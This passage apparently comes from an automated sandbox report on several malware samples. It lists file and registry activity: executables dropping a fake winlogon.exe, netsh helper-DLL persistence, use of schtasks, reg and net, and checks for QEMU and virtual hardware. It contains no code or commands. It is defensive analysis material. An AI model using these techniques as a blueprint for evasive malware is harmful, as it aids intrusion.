| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\data.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\well_known_domains.dll | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\protocols.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\v1FieldTypes.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\ct_config.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\edge_autofill_global_block_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\kp_pinslist.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\winlogon.exe | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\safety_tips.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\keys.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\crs.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\winlogon.exe | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\regex_patterns.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmp1.jpg | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
